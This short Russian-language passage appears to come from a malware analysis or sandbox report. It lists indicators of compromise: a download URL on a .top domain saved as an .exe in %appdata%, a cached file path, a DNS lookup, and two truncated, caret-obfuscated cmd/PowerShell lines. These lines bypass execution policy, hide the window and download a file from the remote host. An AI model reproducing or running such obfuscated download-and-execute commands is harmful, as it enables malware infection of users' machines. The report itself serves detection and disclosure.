Техническая информация
- http://zofelaseo.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^O^weRs^HE^Ll.eX^E -Exe^Cu^TIon^poLI^CY^ ^B^Y^PA^s^S^ ^-^N^o^PRO^FIl^E ^-WiNDO^wS^T^yl^e H^IDDeN (^n^eW-o^BJ^E^Ct sYsTeM^.NeT^.^We^BC^LIE^N^T)^.^dOWN^lOa^D^f^ILE('http://zofela...
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\dyps348i\config14[1].txt
- DNS ASK zo###aseo.top
- '<SYSTEM32>\cmd.exe' /c "p^O^weRs^HE^Ll.eX^E -Exe^Cu^TIon^poLI^CY^ ^B^Y^PA^s^S^ ^-^N^o^PRO^FIl^E ^-WiNDO^wS^T^yl^e H^IDDeN (^n^eW-o^BJ^E^Ct sYsTeM^.NeT^.^We^BC^LIE^N^T)^.^dOWN^lOa^D^f^ILE('http://zofela... (со скрытым окном)